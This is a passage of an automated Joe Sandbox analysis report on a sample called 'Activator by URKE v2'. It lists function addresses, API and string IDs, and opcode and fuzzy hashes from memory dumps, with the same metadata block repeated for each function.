                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ObjectRelease$CapsDevice
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1061551593-0
                                                                                                                                                                                                                                                  • Opcode ID: a39c6f5289eeb3ccdb5d0bd3d1d8e799027f00d468a18c17e9e0985c25432a47
                                                                                                                                                                                                                                                  • Instruction ID: ec2da01ae72ad80bf7b11bd6b8bb32b0181276c37345f683ddc74c406df1632e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a39c6f5289eeb3ccdb5d0bd3d1d8e799027f00d468a18c17e9e0985c25432a47
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A814C76B18A4986EB10EF6AD4A06ADB775FB88F88B844132CE0D97764CF3CE505C750
                                                                                                                                                                                                                                                  Function 00007FF7E5F0DE44 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FormatInfoLocaleNumber
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2169056816-0
                                                                                                                                                                                                                                                  • Opcode ID: 8ec788ba47fdf6df10e78e7ac2cd74069c16868f0c385ff3f057b0f2eb63ee47
                                                                                                                                                                                                                                                  • Instruction ID: 11999ef8ccbc362e625aea2dcbce1c8e1addd668e27a76b1b357b2cf93f7f1ce
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ec788ba47fdf6df10e78e7ac2cd74069c16868f0c385ff3f057b0f2eb63ee47
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE119072A18B8885E721AF20E8207E9B360FF88B84FC44136DA8C83658DF3CE655C755
                                                                                                                                                                                                                                                  Function 00007FF7E5EF6768 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Version
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                                                                                                                                  • Opcode ID: 4077126cdc8ab987fc50741f9daa8f64bdc94cd5a3d95bfaac1a76796dfe440a
                                                                                                                                                                                                                                                  • Instruction ID: a2fa70cd895562206dcf96d6ec8e38b6ffb81c0269094e664a564fa57d354e1b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4077126cdc8ab987fc50741f9daa8f64bdc94cd5a3d95bfaac1a76796dfe440a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8901407690854A8BE624EB04E9607BAB3A0FB88B50FD00236D58DC77D4DF3CE4018E22
                                                                                                                                                                                                                                                  Function 00007FF7E5F1C074 Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                  • API String ID: 3215553584-4108050209
                                                                                                                                                                                                                                                  • Opcode ID: 9d335eb4e928305fcc536e7a574871e99efd96511b41f203bfcc60166aca6fdf
                                                                                                                                                                                                                                                  • Instruction ID: 5f7dd2a96fab7d1a326a9e67f0b966852a8d756f83e0da498430471256cb6289
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d335eb4e928305fcc536e7a574871e99efd96511b41f203bfcc60166aca6fdf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48813921A1816A46EAA8BA2542607FDA390EF41F44FD41533DF09E7697CE3DE805C722
                                                                                                                                                                                                                                                  Function 00007FF7E5F1BDF8 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                  • API String ID: 3215553584-4108050209
                                                                                                                                                                                                                                                  • Opcode ID: db1fee231e5625b661d99c0bb1e1601d32928d345e8b8bd10099f265d6b394a5
                                                                                                                                                                                                                                                  • Instruction ID: d9524f793f5d16c441e208f4106e05bc95b941709e0bb4193aa52b4b4212616c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db1fee231e5625b661d99c0bb1e1601d32928d345e8b8bd10099f265d6b394a5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B710521A0C24AC6EB68AA6542603FEE7919B41F44F940537DE09C76D7CF3DE8458B63
                                                                                                                                                                                                                                                  Function 00007FF7E5F1FD18 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                                                                                                                  • Opcode ID: 75bc8b6b70552213c492e2b4d537d895552732abb840669c88296365ff73b3bd
                                                                                                                                                                                                                                                  • Instruction ID: 70008de70ced8e5f8bcfa7441b16ddb115d377a1d577075108e1f2a6d4f13b9b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75bc8b6b70552213c492e2b4d537d895552732abb840669c88296365ff73b3bd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F941D172714A4886EE04EF2AD9642E9B7A1A758FD0B89A037DE0DC7755DE3CD486C300
                                                                                                                                                                                                                                                  Function 00007FF7E5F241B0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                                                                                                  • Opcode ID: be7ed4402fc1a38c1953c688923f2ad906cda00ccdf3b5d5fa14c8939cdf2fd3
                                                                                                                                                                                                                                                  • Instruction ID: e88f79cff63757797b2859de1b2911f98fd8e822ed679c631fd66013139ee400
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be7ed4402fc1a38c1953c688923f2ad906cda00ccdf3b5d5fa14c8939cdf2fd3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75B09224E07B0EC6EA093B516C9236862A87F48B00FD4803AC40E81360DE3C25A58B22
                                                                                                                                                                                                                                                  Function 00007FF7E5EFBF0C Relevance: .6, Instructions: 587COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: cd28e31d7d5d8dacbc8c1e36a10d9298773be20ef7319678f464fee92af96a22
                                                                                                                                                                                                                                                  • Instruction ID: 4571d60be087602d140e7d8f8441354df4974f41558fa429fa5ba416c8c85e0d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd28e31d7d5d8dacbc8c1e36a10d9298773be20ef7319678f464fee92af96a22
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA2204B3B206508BD728CF25C89AE5E3766F798744B4B8229DF4ACB785DB38D505CB40
                                                                                                                                                                                                                                                  Function 00007FF7E5EFB318 Relevance: .3, Instructions: 260COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c6c4f15c2075db455a8805df7f1b959bd99bc7369c78054583d6a965d91bd105
                                                                                                                                                                                                                                                  • Instruction ID: e157a74147b2bc6cb9aec6c0d4d71c632500f0aeb464bdb88f92c53bfd30a4bb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6c4f15c2075db455a8805df7f1b959bd99bc7369c78054583d6a965d91bd105
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41D19C73A181D14EE312CB79A0245BEBFB5E31D34DB898262DFD59364AC53EE101DB60
                                                                                                                                                                                                                                                  Function 00007FF7E5EFB948 Relevance: .2, Instructions: 181COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 9782f85efb0ae2e1c0b67e86eaa04f67255253bd9529923cb00556c4c2cc06da
                                                                                                                                                                                                                                                  • Instruction ID: 00ed71e1f8b788dbe6fac63fc98d93f3b51b3d3cf05ae43006c3280a41bd782b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9782f85efb0ae2e1c0b67e86eaa04f67255253bd9529923cb00556c4c2cc06da
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC615622F181D949EB019F718A205FDBFA5A709B847C58033CEDA9B64ACE3CE115CB31
                                                                                                                                                                                                                                                  Function 00007FF7E5F28DF0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 925daada8ef65e2677460b522fd56a987e460062fe4befbd33bf430193fcb847
                                                                                                                                                                                                                                                  • Instruction ID: 7d6464ef92245882d880fc8d9696a6a0c8473787d571980db0491ee09eb32cd3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 925daada8ef65e2677460b522fd56a987e460062fe4befbd33bf430193fcb847
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FF0C8717286598BDBA49F68A45276977D0F708784F90803AE58DC3B04CB3C94508F14
                                                                                                                                                                                                                                                  Function 00007FF7E5F16B24 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 915a11522949b389e451a5ed0c02c5f26bdaa58b853bb1385cc96cba591218a7
                                                                                                                                                                                                                                                  • Instruction ID: e0a5ffd4cff18a3c0136b4adcc466f6aa4f317a62c0f469e582639c917a76d65
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 915a11522949b389e451a5ed0c02c5f26bdaa58b853bb1385cc96cba591218a7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81A0016994891AD0E648AB00AA702A0A224AB60B00B800432D80E814A2DE3CA840C222
                                                                                                                                                                                                                                                  Function 00007FF7E5F161E0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                                                                                                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 2565136772-3242537097
                                                                                                                                                                                                                                                  • Opcode ID: 029695a6267facf631d40e22352065ea960f1d0c33bf652913798791beb6e733
                                                                                                                                                                                                                                                  • Instruction ID: 7ae77ca3f8ac17f17bf2cca73c66a494a2d9cbdac7e772d245d7bfe354831121
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 029695a6267facf631d40e22352065ea960f1d0c33bf652913798791beb6e733
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D211764E09A4F81FE15BB11A9743F5A2A0AF54F40FC40436C90E86AA6EE3CE945C322
                                                                                                                                                                                                                                                  Function 00007FF7E5F0DF84 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 269COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                                                                                                                                                                                                                  • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                                                                                                                                                                                  • API String ID: 431506467-1315819833
                                                                                                                                                                                                                                                  • Opcode ID: a5c1420563de154322e58b961742644a218078f87695e0f8e231236245ab560e
                                                                                                                                                                                                                                                  • Instruction ID: 62a9b9ac50cb31b437357371ebffbc0ddb8ecaf71631f703de33cd37cbc6ec05
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5c1420563de154322e58b961742644a218078f87695e0f8e231236245ab560e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AB10462F1974A85FB00EB64D4643EC6362AF45B98F844232DF5CA7ADADE3CD055C321
                                                                                                                                                                                                                                                  Function 00007FF7E5F0AB10 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 204memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
